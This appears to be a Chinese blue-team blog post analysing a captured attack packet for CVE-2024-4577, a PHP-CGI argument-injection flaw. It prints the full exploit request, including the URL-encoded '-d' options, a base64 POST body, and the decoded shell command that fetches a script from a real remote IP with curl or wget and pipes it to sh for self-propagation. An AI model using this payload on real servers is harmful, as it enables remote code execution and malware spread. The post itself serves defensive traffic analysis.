WEB安全--蓝队日志--RCE数据包分析

一、分析数据包内容

攻击者通过URL请求+POST传参的方式试图绕过IPS测试RCE漏洞的利用

URL请求中的内容进行urlcode解码后是这样的:

复制代码
http://资产IP/hello.world?-d allow_url_include=1 -d auto_prepend_file=php://input
1. -d allow_url_include=1
  • 使用 PHP 的 -d 命令行参数,在执行时动态设置配置项
  • allow_url_include=1:启用从 URL 包含文件的功能,这通常在 php.ini 是禁用的。
  • 它允许 include()require() 加载远程地址,如 http://attacker.com/shell.txt
2. -d auto_prepend_file=php://input
  • 这个设置使 PHP 在解析主脚本之前,自动包含一个文件
  • 这里指定的文件是 php://input,也就是HTTP 请求体(POST data)中的原始输入流
  • 也就是说可以直接包含POST中的数据并执行

然后再结合POST传递的内容分析:

请求体中的内容是:

复制代码
<?php shell_exec(base64_decode("WD0kKGN1cmwgaHR0cDovLzEwNC4yNDUuMjQwLjI4L3NoIHx8IHdnZXQgaHR0cDovL
zEwNC4yNDUuMjQwLjI4L3NoIC1PLSk7IGVjaG8gIiRYIiB8IHNoIC1zIGN2ZV8yMDI0XzQ1Nzcuc2VsZnJlcA=="));
echo(md5("Hello CVE-2024-4577")); ?>

其中base64字段解码后:

复制代码
<?php shell_exec( X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); 
echo "$X" | sh -s cve_2024_4577.selfrep);

echo(md5("Hello CVE-2024-4577")); ?>

这条命令的目的是利用远程代码执行漏洞(RCE)来从远程服务器下载一个脚本并执行它,而它特别指向了一个命名为 cve_2024_4577.selfrep 的 payload,表明攻击者试图利用 2024 年披露的某个 CVE(CVE-2024-4577)漏洞,进行进一步的自动传播或感染操作

二、判断攻击者的目的

1、通过GET参数-d开启allow_url_include=1和auto_prepend_file=php://input

其目的是执行POST传递的数据流

2、POST注入恶意PHP脚本,内容为:

使用shell_exec()执行shell命令

复制代码
X=$(curl http://104.245.240.28/sh || wget http://104.245.240.28/sh -O-); echo "$X" | sh -s cve_2024_4577.selfrep

通过curl或wget访问攻击者远程搭建的服务器中104.245.240.28中的sh文件

把内容赋值给X

将X的值通过管道符传递给靶机本地sh执行

-s cve_2024_4577.selfrep 表明传递一个参数给脚本,脚本内部可能会根据这个参数执行

3、然后通过echo(md5("Hello CVE-2024-4577")); 输出一个hash,用于回显检测是否成功执行。

相关推荐
xixingzhe232 分钟前
SpringBoot + Nginx 免鉴权接口安全防护方案
运维·nginx·安全
中科岩创1 小时前
宁波某大学高支模施工安全监测实训模型应用
科技·物联网·安全·自动化
项目经理老王2 小时前
OpenClaw无捆绑安装包,安全纯净版AI助手部署
人工智能·安全
小李@Free2FA8 小时前
跨境卖家多平台二次验证统一管理
安全·外贸·2fa·二次验证
云祺vinchin9 小时前
混合云异构环境下的灾备实战:VMware+Hyper-V统一保护方案解析
安全·容灾备份·容灾备份体系
MartinYeung510 小时前
从注入攻击到诈骗:@martin_yeung/llm-up-guardrail 提供生产级 AI 安全防护
人工智能·安全
chengbei1210 小时前
SoloXSS:一款现代化的自托管 XSS平台
web安全·xss漏洞·xss平台
anbingsoft1211 小时前
企业加密软件软件有哪些?企业加密软件:让设计图纸安全无忧,年度热销
网络·安全·电脑
一楼的猫12 小时前
AI写作检测机制技术深度解析:200+维度检测、叙事指纹与网文AI辅助怎么过审
人工智能·学习·安全·chatgpt·ai写作
技术不好的崎鸣同学13 小时前
[极客大挑战 2019]EasySQL 思路及解法
网络·安全·web安全